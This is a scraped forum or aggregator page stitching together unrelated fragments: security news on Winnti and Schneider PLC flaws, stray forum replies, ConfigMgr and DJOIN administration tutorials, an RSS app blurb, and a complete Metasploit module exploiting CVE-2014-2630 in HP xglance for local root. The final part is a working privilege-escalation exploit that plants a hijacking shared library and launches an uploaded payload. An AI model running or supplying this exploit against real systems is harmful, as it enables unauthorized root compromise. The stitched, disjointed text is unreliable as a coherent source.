Dumitras explained as much in an email. The number of MMO game developers in South Korea and Taiwan is high, and beyond that, there's no way to know whether the attackers used their access to actually abuse software builds or game servers. That means there's little to nothing end users can do to know if they were affected. Given Winnti's previous successes, the possibility can't be ruled out.

Via arstechnica.com -
What the heck kind of pawn shop did you go to? Even in the most backwater village they test it with a file and acid and you sign a contract. You want to pull something off and you don't know how.
-
https://www.smsglobal.com - talk to them. Trust me.
-
Vulnerabilities reminiscent of Stuxnet found in two Schneider Electric products could allow an attacker to gain operational control of a device by intercepting and then retransmitting commands. Trustwave's global OT/IoT security research team uncovered the flaws in Schneider's SoMachine Basic v1.6 and the Schneider Electric M221 Programmable Logic Controller (PLC), firmware version 1.6.2.0. By exploiting the flaws, a malicious actor could take control of the devices in the same manner operators circa 2005 used the Stuxnet worm to ultimately cause Iran's nuclear centrifuges to destroy themselves.

Trustwave analysts were able to use the Schneider Electric vulnerability to intercept, change, then resend commands between the engineering software and the PLC. The second issue stems from the fact that SoMachine Basic does not perform adequate checks on critical values used in communications with the PLC. If exploited, it could allow an attacker to send manipulated packets to the PLC without the software being aware of the manipulation. That is eerily similar to Stuxnet's modus operandi which, according to a 2010 Symantec report, infected one of the Iranian engineering workstations being used to manage and control the Siemens Step 7 PLC. Stuxnet infected all the Step 7 projects and side-loaded a malicious dynamic link library (DLL) used by the software to communicate with the PLC. It intercepted and modified all the legitimate packets to the controllers and successfully uploaded malicious logic code to change the controllers' behavior. The malicious library file prevented PLC operators from realizing that the PLCs were compromised.

Schneider has patched the SoMachine Basic v1.6 vulnerability and is working on a final mitigation for the second attack. In the meantime, the company recommended users block the port on the firewall or disable the protocol. In addition, Trustwave urged organizations to harden the network through micro-segmentation and zoning, ensuring that ICS assets and networks are monitored for abnormal communications.

Via scmagazine.com
-
No, you have it here
-
^ convinced. On topic: if you gave them access to your phone, of course they can; maybe even without it, but with few exceptions
-
Have you ever wished you automatically received an e-mail every time something specific happens in your ConfigMgr hierarchy, but you couldn't find an alert or other notification option in the console? One way many admins have accomplished this in the past is using a Status Filter Rule to run a PowerShell script which sends an e-mail to an SMTP server. This is great, but what if you want to expand things a bit and take other actions besides just sending an e-mail?

If you haven't yet had the chance to play with Microsoft Flow, I highly recommend checking it out. A close equivalent is Logic Apps, which is, for the most part, the same; however, Flow is geared more toward Office workers, business users, and Sharepoint admins, while Logic Apps has more advanced integration options available. At the end of the day, both will work for this purpose, so it's ultimately up to you which one you use, and if you know how to use one, you pretty much know how to use the other. Click here if you want to read more comparisons of the two. You get Flow free with Office 365, but if you want to hit Flow hard and plenty, you may eventually need a fancier slightly less than free version 🙂

First, browse to http://flow.microsoft.com

- Click My Flows, New, Automated from Blank.
- Enter a meaningful name for your flow in the Flow name blank.
- Click Skip (you don't need to select a trigger yet).
- In the search blank, enter Request, then click on the Request trigger in the top window and When a HTTP request is received in the Trigger window.
- In the Request Body JSON blank, enter your JSON code. In this example, we're sending an e-mail, so we really just need a TO, a SUBJECT, and an e-mail BODY.
- Click Show advanced options and change the method to POST.
- Click New step to add a new step to your flow.
- Click on the Office 365 for Outlook category, and find the Send an e-mail action.
- Add each Dynamic content item to the appropriate field in the Send an email step. If you don't see all of them on the right side, look for a blue clickable See more link in the Dynamic content window to find them. Optionally, you can also click Show advanced options and change the importance of the e-mail and other settings.
- Click Save to save the two flow steps we created.

Now if you look back at the very first step for the HTTP request, you'll notice a URL is now provided, for example "https://prod-48.westus.logic.azure.com:443/workflows/abcdef/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=abcdef_ghijkl". This is a REST API URL auto-generated by Flow and unique to the Flow you're creating. So keep your URL safe, be sure not to share it (unless you like surprises), and if you create another Flow, realize you won't use the same one you're using now :). Save your unique URL off somewhere safe for now.

Now, you have two options for testing out the flow. You can put together a quick PowerShell script, or use a tool like Postman.

Option 1: PowerShell

$uriFlow = "https://prod-109.westus.logic.azure.com:443/workflows/blahblah"
$body = @{
    "subject" = "Test"
    "body"    = "This is a test from Flow HTTP request"
    "to"      = "you@yourdomain.com"
} | ConvertTo-Json
Invoke-RestMethod -Method Post -Uri $uriFlow -Body $body -ContentType "application/json"

Option 2: Postman

- Launch Postman, click New and Request.
- Click Body, change the radio button to raw, and pick JSON (application/json).
- Type up the JSON code as seen in the example below, using your To, subject, and body.
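The raw body is just the same three fields the PowerShell example used; a minimal hedged reconstruction (addresses are placeholders):

{
    "to": "you@yourdomain.com",
    "subject": "Test",
    "body": "This is a test from a Postman HTTP request"
}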
Click the Send button, and you should receive an e-mail at the To address you used, looking a bit like this:

If all is well at this point, the only thing left to do is create some PowerShell code that sends the information you want to receive in the e-mail. What are some good examples? One possibility: you may want to be notified when things happen in ConfigMgr. For example, every time your Software Update Point synchronizes with Microsoft and your Automatic Deployment Rule (ADR) adds updates to a Software Update Group and deploys them, you might want to know exactly what was deployed without having to go look in the console each time.

So, the first step is to figure out which Status Message ID you want. In my example, Message ID 5800 is generated each time my ADR runs and adds software updates to a Software Update Group and deploys them. However, when an administrator deploys baselines, this also generates the same 5800 Message ID, so I need to make sure I'm selective in my PowerShell script in order to filter these other CI Assignments out. Also, if you open the status message, you can decide how to customize your script based on the information within it. For example, Message ID 5800 mentions the Software Update Group which was deployed. This is useful because you can use the Get-CMSoftwareUpdateGroup cmdlet to find out what updates are in a group. I'll use my ADR rule named OS Updates in this example. Here's what the status message looks like when it runs and creates the Software Update Group:

In your PowerShell script, the first thing you always need to do whenever utilizing ConfigMgr PowerShell cmdlets is import the ConfigMgr PowerShell module. There are some different ways to accomplish this, and you could also dynamically pass the site code on the command line of the PowerShell script and add a parameter to the PARAM section to capture it, if you had more than one site doing this. For simplicity, I'm going to use a single stand-alone Primary and hardcode the site code.

Once we've picked the status message we want to trigger our Flow on, click Status Filter Rules to create a new one. Name it something useful, and enter the Message ID (5800 in my example). Click the Actions tab, and select the Run a program checkbox. This is where we need to enter the command line that launches our PowerShell script. In my example, I will use the following command line:

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -nologo -noprofile -executionpolicy bypass -file c:\scripts\Get-UpdateGroupContent.ps1 -Desc "%msgdesc"

This assumes my script is sitting in c:\scripts and named Get-UpdateGroupContent.ps1. %msgdesc is the magic variable that correlates to the Description field in the status message. Next, move the Status Filter Rule up in priority so it is somewhere higher than the canned rules 14 and 15.

Within the script, I needed to split up the Description value of %msgdesc to collect ONLY the information I wanted to take the next action on. In this example, if I split every word into an array with PowerShell's .Split, look at array members 8 and 9, and -join them back together, I'm left with only the Software Update Group name MINUS the date and time automatically appended to it by ConfigMgr. Set it to a variable like $DeploymentName.
So I needed to scrape just the Description field out of the status message ("CI Assignment Manager successfully processed new CI Assignment OS Updates 2019-06-26 22:01:13") and set a variable named $DeploymentName to equal OS Updates, which is the actual name of my ADR:

$Split = $Desc.Split(" ")
$DeploymentName = ($Split[8], $Split[9] -join " ")

Now $DeploymentName = OS Updates, the name of my ADR. Next, I'll check whether the result of a Get-CMSoftwareUpdateGroup using the -Name of my $DeploymentName variable is $null or not (simply putting code into the () of an IF statement equates to "if the results of this are not null"):

If ($SUG = Get-CMSoftwareUpdateGroup -Name "$($DeploymentName)*" | Where-Object {(Get-Date $_.DateCreated -Format D) -eq (Get-Date -Format D)})

I also don't want to get an e-mail every time my SCEP/Defender definitions are updated, so I add a line to filter those out as well:

If ($DeploymentName -notlike "*Definition*")

Next, I build a collection of PowerShell objects: for each update, I create a PSObject, add the values I care about as properties, and accumulate the results in a variable called $info. You can choose any properties from the results you like. I decided the name of the update, the URL, the date it was released, and the maximum runtime setting would be most helpful:

$info = @()
ForEach ($item1 in (Get-CMSoftwareUpdate -UpdateGroupID $SUG.CI_ID)) {
    $object = New-Object -TypeName PSObject
    $object | Add-Member -MemberType NoteProperty -Name "Update Title" -Value $item1.LocalizedDisplayName
    $object | Add-Member -MemberType NoteProperty -Name URL -Value $item1.LocalizedInformativeURL
    $object | Add-Member -MemberType NoteProperty -Name "Date Posted" -Value $item1.DatePosted
    $object | Add-Member -MemberType NoteProperty -Name "Max RunTime (mins)" -Value $item1.MaxExecutionTime
    $info += $object
}

I also decided I want to apply a little CSS to beautify my e-mails a bit:

$head = @"
<Title>Software Updates Group Report</Title>
<style>
body { background-color:white; font-family:Arial; font-size:10pt; column-width:150px;}
td, th { border:1px solid black; border-collapse:collapse; column-width:150px; }
th { color:white; background-color:black; }
table, tr, td, th { padding: 2px; margin: 0px ; }
tr:nth-child(odd) {background-color: grey}
table { width:95%;margin-left:0px; margin-bottom:20px;}
h2 { font-family:Tahoma; color:#6D7B8D; }
</style>
"@

$html = $info | ConvertTo-Html -Fragment | Out-String

So when it's all done and your ADR runs, here's what you get!

What's another useful way to use this capability? What about sending all administrative audit status messages up to a Sharepoint list, SQL database, or Excel spreadsheet? The possibilities are endless!

And finally, here's the full script. Don't forget to replace the $SiteCode and $uri variables to match your environment.
[CmdletBinding()]
param(
    # Software Update Group description passed in via %msgdesc
    [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
    [String] $Desc
)

$SiteCode = "PRI"

# Load ConfigMgr module if it isn't loaded already
if (-not (Get-Module -Name ConfigurationManager)) {
    Import-Module ($Env:SMS_ADMIN_UI_PATH.Substring(0, $Env:SMS_ADMIN_UI_PATH.Length - 5) + '\ConfigurationManager.psd1')
}

# Change to site
Push-Location
Set-Location ${SiteCode}:

$Split = $Desc.Split(" ")
$DeploymentName = ($Split[8], $Split[9] -join " ")

If ($SUG = Get-CMSoftwareUpdateGroup -Name "$($DeploymentName)*" | Where-Object { (Get-Date $_.DateCreated -Format D) -eq (Get-Date -Format D) }) {
    If ($DeploymentName -notlike "*Definition*") {
        $info = @()
        ForEach ($item1 in (Get-CMSoftwareUpdate -UpdateGroupID $SUG.CI_ID)) {
            $object = New-Object -TypeName PSObject
            $object | Add-Member -MemberType NoteProperty -Name "Update Title" -Value $item1.LocalizedDisplayName
            $object | Add-Member -MemberType NoteProperty -Name URL -Value $item1.LocalizedInformativeURL
            $object | Add-Member -MemberType NoteProperty -Name "Date Posted" -Value $item1.DatePosted
            $object | Add-Member -MemberType NoteProperty -Name "Max RunTime (mins)" -Value $item1.MaxExecutionTime
            $info += $object
        }

        $head = @"
<Title>Software Updates Group Report</Title>
<style>
body { background-color:white; font-family:Arial; font-size:10pt; column-width:150px;}
td, th { border:1px solid black; border-collapse:collapse; column-width:150px; }
th { color:white; background-color:black; }
table, tr, td, th { padding: 2px; margin: 0px ; }
tr:nth-child(odd) {background-color: grey}
table { width:95%;margin-left:0px; margin-bottom:20px;}
h2 { font-family:Tahoma; color:#6D7B8D; }
</style>
"@

        $html = $info | ConvertTo-Html -Fragment | Out-String
        # note: referencing the update group found above ($SUG), not the loop variable
        $Title = "Total assigned software updates in " + $SUG.LocalizedDisplayName + " = " + $info.count

        # Required API Variables
        $uri = 'https://prod-109.westus.logic.azure.com:443/workflows/abcdefg7b8b34e76a2b85a3c517fa5b4/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=abcdef5Ap7w1fEr0cMk5Z7yuo5F_JYuRabcdefg'
        $body = @{
            "to"      = "russ@russrimmerman.com"
            "subject" = "Software Update Group Report"
            "body"    = $head + $html
        }
        # $body  # uncomment to inspect the payload

        # RESTful API Call
        $r = Invoke-WebRequest -Uri $uri -Method Post -ContentType "application/json" -Body (ConvertTo-Json -InputObject $Body)
    }
}

Source russthepfe.com
-
It's been a few months since I've sat down to write something. I've been taking a break, trying to pick up some woodworking skills and spend a bit more time with the family during this COVID-19 lockdown. On March 5, I left work to take a week off for Spring Break and never returned to the office. Today is May 5. I wasn't prepared for being at home, and since I don't regularly work from home, I don't have any hardware here other than a normal desk setup. At the office, we have a build lab and I have access to numerous hardware models that I can test with. At home, I just have my company-issued laptop and a VPN connection, which is generally fine for the few days per month that I'm actually working from home. We have a VMWare build farm as well, where I generally do most of my image builds and testing unless I need to test drivers or other device-specific things. One thing our VMWare farm doesn't have is direct internet access; we only have a business network VLAN, which makes it impossible to test VPN-related things (split-tunneling, Cloud Management Gateway, internet-only clients, etc.).

More on split-tunneling and Microsoft Updates from ConfigMgr here, from @RobDotYork and @MikeTerrill:

https://techcommunity.microsoft.com/t5/configuration-manager-blog/managing-remote-machines-with-cloud-management-gateway-in/ba-p/1233895
https://techcommunity.microsoft.com/t5/configuration-manager-blog/managing-patch-tuesday-with-configuration-manager-in-a-remote/ba-p/1269444
https://miketerrill.net/2020/03/18/forcing-configuration-manager-vpn-clients-to-get-patches-from-microsoft-update/

The Problem

So here I am, stuck at home, with a mandate from management to get split-tunneling working to reduce VPN bandwidth for Microsoft Updates, with no way to test other than my primary device, which is never fun. So I started thinking. I had just spun up Hyper-V to build a new ConfigMgr lab for some Intune testing, so I decided to see if I could somehow build a new VM to our standards that I could test VPN on. The semi-obvious answer would be to use AutoPilot, except I would need line-of-sight to the domain controller for hybrid join to work, and we are just beginning to get Intune configured in production (see the note about the lab build above...). Our VPN client requires user domain credentials and a valid computer certificate issued from our CA in order to connect. The domain credentials are easy; the client certificate, not so much. So I started playing around with DJOIN and had a breakthrough. I've never needed to use DJOIN before, so this was a cool learning experience for me. If you want to see what I was able to do, keep reading.

The Plan

Here are the steps I'll be going through:

- Use DJOIN on a domain-joined device to create an offline join blob
- Use DJOIN to "install" the offline blob on a new, clean VM
- Install the company VPN client
- Install the ConfigMgr client
- Run our standard OSD Task Sequence in Apps-Only mode to standardize the VM

DJOIN Provision

If you've ever looked at logs during OSD, you've likely seen references to DJOIN; that's pretty much where my experience with DJOIN ends.

SetupAct.Log from the Panther folder

As I started playing with it, I discovered that it is a very powerful tool capable of not only creating an offline domain-join object, but also specifying the OU, the certificate template, and more. It was like finding a Swiss Army knife on a desert island.
You can read more about DJOIN here: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff793312(v=ws.11)

You can look up the parameter info at the link above, but essentially this command line will do the following:

/PROVISION /DOMAIN – Join the domain
/MACHINE – Specify the device name
/MACHINEOU – Put the device in a specific OU
/SAVEFILE – Save to a file
/CERTTEMPLATE – Generate a computer auth cert using our domain computer template
/REUSE – Reuse the device name if it exists

Provision.cmd

DJOIN /PROVISION /DOMAIN "asd.net" /MACHINE "ASD-MyVM1" /MACHINEOU "CN=Computers,DC=asd,DC=net" /SAVEFILE "C:\Temp\ASD-MyVM1_ODJ.txt" /CERTTEMPLATE "ASD-DomainComputerTemplate" /REUSE

Once you run this command, you can check Active Directory and you should see your new computer in the OU that you specified, and you’ll have a text file in the /SAVEFILE location.

RequestODJ

STOP! Ensure that you have a local Admin account on the target device at this stage. If you don’t, you won’t have admin rights after this step. Also, you could choose to install your VPN client before this step, but I’m doing it afterwards. It doesn’t make a huge difference.

As mentioned, you’ll need a new, clean device. I used Hyper-V, but this will work with a VM or a physical device. You can either use DISM to mount a WIM and run the command against the offline image (excluding /LOCALOS), or spin up the device and run the command on it directly (including /LOCALOS); see the DISM sketch below. Simply copy your Offline Domain Join (ODJ) text file to the new device and run the following:

/REQUESTODJ – Tells the device to request an offline domain join on the next restart
/LOADFILE – Specifies the ODJ blob file that you generated with /PROVISION
/WINDOWSPATH – The path to Windows for an offline image or, if used with /LOCALOS, the Windows directory of the device you are running the command on
/LOCALOS – Targets the local OS

RequestODJ.cmd

DJOIN /REQUESTODJ /LOADFILE C:\Temp\ASD-MyVM1_ODJ.txt /WINDOWSPATH %SystemRoot% /LOCALOS

Once you run the command, reboot the device and you’ll be prompted to log in with your domain credentials. Since you won’t be on the domain yet, log back in with your local admin credentials. To verify that this all worked, you can check Computer Management to see that you’re on the domain, and check your Local Computer personal certificate store to see that you have a domain CA cert issued to the device name you specified; the root and intermediate certs should be there as well (see the PowerShell verification sketch below).

VPN

This is the part that may be a show-stopper for you, depending on the type of VPN you use and its auth requirements. I got lucky with the device cert and user domain creds. At this point, you simply want to install your company VPN client and configure it properly. Since everyone will have something different, I’m not going to go into details. In my case, once the client was installed from an MSI, I was able to connect to the VPN portal and sign in with my domain credentials, with the device certificate being used in the background as well. Once I established the tunnel successfully the first time, the VPN client was ready to go. I can reboot the machine, then log in with my domain credentials, and I’m on!

That’s pretty much it

From here, what you do is up to you. You should have a computer that’s domain joined and on VPN. For me, I wanted to test using a device that matched our standard build.
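Two hedged addenda to the DJOIN steps above. First, the offline (mounted WIM) variant mentioned earlier; the image and mount paths are hypothetical placeholders:

:: Hypothetical paths; mount the image, apply the ODJ blob offline, then commit
DISM /Mount-Image /ImageFile:C:\Temp\install.wim /Index:1 /MountDir:C:\Mount
DJOIN /REQUESTODJ /LOADFILE C:\Temp\ASD-MyVM1_ODJ.txt /WINDOWSPATH C:\Mount\Windows
DISM /Unmount-Image /MountDir:C:\Mount /Commit

Second, the post-reboot verification can be scripted rather than clicked through. A minimal PowerShell sketch; ASD-MyVM1 matches the example commands above, and the exact certificate subject depends on your CA template:

# Confirm the offline domain join took effect
Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Name, Domain, PartOfDomain

# Look for the machine cert in the Local Computer personal store
Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.Subject -like "*ASD-MyVM1*" } |
    Select-Object Subject, Issuer, NotAfter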
If you don’t need a standardized build, you can pretty much stop here.

Standardizing the Image

If you want to complete your build, you will need to manually install the ConfigMgr client using the command lines appropriate to your site. From a domain-connected device, copy the client installation media to the new device. Once installed, drop the machine into a collection that has your “Apps-Only” Task Sequence (keep reading) advertised to it, and run it once it shows up.

If you’ve read any of my Task Sequence blogs, you may have come across my “Building a Smarter Task Sequence” post. In it, I detail how to build an OS Deployment Task Sequence that can be re-run on failed devices without reinstalling the whole OS. You may also be able to just break out everything after the Setup Windows and ConfigMgr step in your Task Sequence and create a new “Apps-Only” sequence that will finish installing all of the bits that make up your company’s standard build. This would be equivalent to the Task Sequence you’d want to build if you use the new PROVISIONTS command-line option in ConfigMgr 2002 to auto-launch a Task Sequence right after the ConfigMgr client is installed via AutoPilot.

Ultimately, if you have Windows on the box, everything else SHOULD just be apps and policies. Now, if you are offline servicing and doing a bunch of tweaking to your image, or even using a reference image, you may not end up quite standard. We don’t do any of that, so this process is perfect. I just need to install a few standard apps and add a registry key to tag this as a standard build, and my device should match anything we’ve built from bare metal.

Give It A Spin

Once you’ve built your new machine, you should have a device that looks like any other standard device. I was able to spin up several Hyper-V VMs using this process and successfully tested several VPN scenarios to validate our split-tunnel configuration, which made all of the effort worth it. I’m sure there is more to learn about DJOIN, but this is what I’ve learned so far. Hope you find some inspiration in this.

Soapbox

I’ve been saying this to anyone who will listen for the past few years, and I have been fighting to make it a reality in my production environment as well: the less you bake into your image and the less you customize your builds, the easier it will be to move to AutoPilot or an Apps-Only TS model that allows you to take advantage of the OS already being on the box. There are MANY reasons why this is an unattainable goal for many orgs, but I challenge you to keep chipping away at your customizations to deliver a vanilla image that could easily be replicated by installing some apps and applying some policies. It’s a worthwhile endeavor, and I’m very glad that we are on a journey to zero (or as close as we can get to zero) customizations.

Source asquaredozen.com
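A footnote on the manual ConfigMgr client install step in the post above: the exact command line is site-specific, but a minimal sketch looks like the following. The management point FQDN mp01.asd.net is a hypothetical placeholder, and PRI matches the site code used earlier in this thread; substitute your own values:

:: Hypothetical MP; run from the copied client installation media
ccmsetup.exe /mp:mp01.asd.net SMSSITECODE=PRI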
-
DatoRSS Search Engine

A small application developed in ReactJS that uses the API provided by FeediRSS API.

Live: www.datorss.com
Run: npm install, npm start
Download: datorss-master.zip or git clone https://github.com/davidesantangelo/datorss.git

Credit: Davide Santangelo
Source
-
Try formatting the text; nothing is visible on the default theme.
-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Performance Monitoring xglance Priv Esc',
        'Description' => %q{
          This exploit takes advantage of xglance-bin, part of HP's Glance (or
          Performance Monitoring) version 11 'and subsequent', which was compiled
          with an insecure RPATH option. The RPATH includes a relative path
          to -L/lib64/ which can be controlled by a user. Creating libraries in
          this location will result in an escalation of privileges to root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Tim Brown', # original finding
          'Robert Jaroszuk', # exploit
          'Marco Ortisi', # exploit
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
        ],
        'Privileged' => true,
        'References' => [
          [ 'EDB', '48000' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
          [ 'PACKETSTORM', '156206' ],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
          [ 'CVE', '2014-2630' ]
        ],
        'DisclosureDate' => 'Nov 19 2014',
        'DefaultTarget' => 0
      )
    )
    register_options [
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Simplify pulling the writable directory variable
  def base_dir
    datastore['WritableDir'].to_s
  end

  def exploit_folder
    "#{base_dir}/-L/lib64/"
  end

  def glance_path
    datastore['GLANCE_PATH'].to_s
  end

  # Pull the exploit binary or file (.c typically) from our system
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
  end

  def find_libs
    libs = cmd_exec "ldd #{glance_path} | grep libX"
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
    return nil if lib.nil?

    lib
  end

  def check
    unless setuid? glance_path
      vprint_error "#{glance_path} not setuid or not found on system"
      return CheckCode::Safe
    end

    lib = find_libs
    if lib.nil?
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
      return CheckCode::Safe
    end
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # delete exploit folder in case a previous attempt failed
    vprint_status("Deleting exploit folder: #{base_dir}/-L")
    rm_cmd = "rm -rf \"#{base_dir}/-L\""
    cmd_exec(rm_cmd)

    # make folder
    vprint_status("Creating exploit folder: #{exploit_folder}")
    cmd_exec "mkdir -p #{exploit_folder}"
    register_dir_for_cleanup "#{base_dir}/-L"

    # drop our .so on the system that calls our payload
    # we need gcc to compile instead of metasm since metasm
    # removes unused variables, which we need to keep xglance-bin
    # from breaking and not launching our exploit
    so_file = "#{exploit_folder}libXm.so.3"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
      code = exploit_data('CVE-2014-2630.c')
      code.sub!('#{payload_path}', payload_path) # inject our payload path
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
      rm_f "#{so_file}.c"
    else
      payload_path = '/tmp/.u4aLoiq'
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx so_file, exploit_data('libXm.so.3')
    end

    # Upload payload executable
    vprint_status 'uploading payload'
    upload_and_chmodx payload_path, generate_payload_exe

    # link so files to exploit vuln
    lib = find_libs
    # just to be safe, Xt and Xp were in the original exploit
    # our mock binary is also exploitable through libXmu.so.6
    # unsure about the real binary
    cd exploit_folder
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
      cmd_exec "ln -s libXm.so.3 #{l}"
    end

    # Launch exploit
    print_status 'Launching xglance-bin...'
    cd base_dir
    output = cmd_exec glance_path
    output.each_line { |line| vprint_status line.chomp }
    print_warning("Manual cleanup of #{exploit_folder} may be required")
  end
end

Author: Tim Brown
Source
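For context on how a module like this is driven, a hedged msfconsole sketch; the module path assumes this file ships under exploits/linux/local/ in the framework tree, and the session number is illustrative:

msf5 > use exploit/linux/local/hp_xglance_priv_esc
msf5 exploit(linux/local/hp_xglance_priv_esc) > set SESSION 1
msf5 exploit(linux/local/hp_xglance_priv_esc) > check
msf5 exploit(linux/local/hp_xglance_priv_esc) > run

As a local exploit it needs an existing shell or meterpreter session on the target, and check exercises the setuid and ldd tests in the module before anything is written to WritableDir.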